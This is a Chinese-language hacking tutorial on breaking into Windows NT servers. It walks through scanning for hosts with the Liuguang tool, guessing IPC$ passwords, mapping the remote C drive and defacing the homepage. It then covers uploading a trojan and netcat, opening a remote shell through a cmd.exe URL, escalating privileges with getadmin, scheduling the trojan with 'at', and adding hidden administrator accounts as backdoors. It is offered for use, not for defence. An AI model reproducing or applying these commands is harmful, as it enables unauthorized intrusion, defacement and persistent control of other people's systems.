| 流光工具對 NT 攻擊教學之一 來源:BlackHawk |
OK! 行動開始, 首先用流光 2000 來對一段 IP 位址進行掃描, 取得 NT 系統的 IP
位址有幾十個, 呵呵, 收獲不小, 好, 再來看看這些 IP 位址, 哪些是有網站的。
幾分鐘過去了, 找到了一個目標﹕111.111.111.111,用流光來進行密碼探測,
呵呵, 有個密碼被探測出來了!
入侵檢測報告
IPC 遠端登陸檢測
Server: 111.111.111.111 UserName: fuckyou Password: sex
不錯,好了,打開 CMD 輸入:
net use \\111.111.111.111\ipc$ sex /user:fuckyou
呵呵, IPC$ 主要是用於 SERVER 到 SERVER 的通信。
透過連接這個共享, 從技術上就能夠實現與這個服務器的有效連接。
然後系統顯示﹕命令成功完成。接著我們可以有幾種攻擊方法選擇﹕
net view \\111.111.111.111
查看系統的共享資源, 看到了一些共享資源, C 碟被共享了, 真的是超級大笨蛋.
net use k: \\111.111.111.111\c
將遠端的 C 碟共享為本地的 K 碟, 到裡面去查查, 哈哈, 看到了 INDEX.HTM, 呵呵,
怎麼改呢, 很簡單, 先做一個主頁, 要改主頁了.
COPY C:\INDEX.HTM \\111.111.111.111\C$\INETPUB\WWWROOT\
打開瀏覽器一看, 修改成功了! 先 COPY 個木馬上去等候下次再用.
COPY C:\SRV.EXE \\111.111.111.111\ADMIN$
(這個 ADMIN 就是 WINNT\SYSTEM32 這個目錄)
再將 ntlm.exe、nc.exe、getadmin.exe、gasys.dll、netsvc.exe 等工具也弄上去。
===========================================================================
我們現在的這個帳號是普通的用戶權限,所以我們必須找一個我們能執行的目錄,
finding...... 呵呵找到一個可以執行的目錄了—fuckmm!將工具 cmd.exe 和 nc.exe
拷到 fuckmm 裡面,好!打開瀏覽器
http://111.111.111.111/fuckmm/cmd.exe?/c%20nc.exe%20-l%20-p%2099%20-t%20-e%20cmd.exe
這個時候瀏覽器不動了, 呵呵, 其實服務器的 telnet 的服務已經產生了:
用 telnet 連接 111.111.111.111 的 99 埠, 呵呵不用密碼, 對方 C:\ 提示符
出現在你的眼前了!
將 getadmin.exe 和 gasys.dll 還有 cmd.exe 都 copy 到 cgi-bin 裡面.
http://111.111.111.111/cgi-bin/getadmin.exe?fuckyou
好了, 讓它去執行吧, CGI Error 成功了, 你現在已經擁有了 webmaster 的權限了,
可以來做幾個後門了.
http://111.111.111.111/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20make%20love%20/add
這樣就建了 make&love 帳號密碼了, 然後完成最後一步﹕
http://111.111.111.111/cgi-bin/getadmin.exe?make
或者
http://111.111.111.111/scripts/tools/getadmin.exe?make
這樣我的 make&love 也擁有了 webmaster 的權限了!
===========================================================================
這種方法是最複雜但是用的是最多的一種, 大家一定要好好的看看!
前面 srv.exe 已經 copy 到 winnt\system32 裡面去了,現在要執行這個“小木馬”
先看看遠端系統的時間﹕
net time \\111.111.111.111
顯示﹕\\111.111.111.111 的目前時間是 2000/2/14 凌晨 02:55
命令成功完成。我們可以讓系統定時執行 srv.exe 了
at \\111.111.111.111 3:00 srv.exe
顯示﹕服務未啟動
哼~~~~~~這個 WEBMASTER 可真可恨!不過山人自有妙計!
netsvc \\111.111.111.111 Schedule /start
顯示﹕服務未啟動
或者我們可以將 srv.exe 拷到 inetpub\scripts 目錄裡去,然後在瀏覽器裡執行﹕
http://111.111.111.111/scripts/srv.exe
好了,這個問題解決了,然後,我們再來執行﹕
net time \\111.111.111.111
顯示﹕\\111.111.111.111 的當前時間是 2000/2/14 凌晨 03﹕15
at \\111.111.111.111 3:20 srv.exe
顯示﹕新加了一項作業,其作業 ID = 1
好了,時間到要進去了﹕
telnet 111.111.111.111 99
一次不行, 多試幾次 c:\winnt\system32 提示符號出現在眼前了!
好了, 反正以後還要攻擊其他的系統的, 不妨做個肉雞吧!
1. 正好我的 ntlm.exe 就被 COPY 到了這個目錄下了, 輸入 ntlm
顯示﹕Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
好, 我們要看看我們的 mate 的 telnet 有沒有啟動:
如果有的話, 我們先要停止 net stop telnet 然後再啟動 net start telnet !
如果沒有, 則直接 net start telnet 就可以了!
下次進來的時候就直接 telnet 111.111.111.111, 輸入 user&passwd 就可以了!
2. 一個後門不夠, 再做一個安全一點的, 將 winnt\system32 的 cmd.exe 改名拷到
winnt\system32\tmd 的 ccc.exe 裡面.
3. 還可以讓 guest 帳號鹹魚翻身:
net user guest /active:yes
然後改密碼,
net user guest sex
將這個帳號加入到 adminstrators 裡面去,
net localgroup administrators guest /add
4. 還有一種方法直接在系統裡輸入:
net user sexy girl /add
然後再加入到 administrators,
net localgroup administrators sexy /add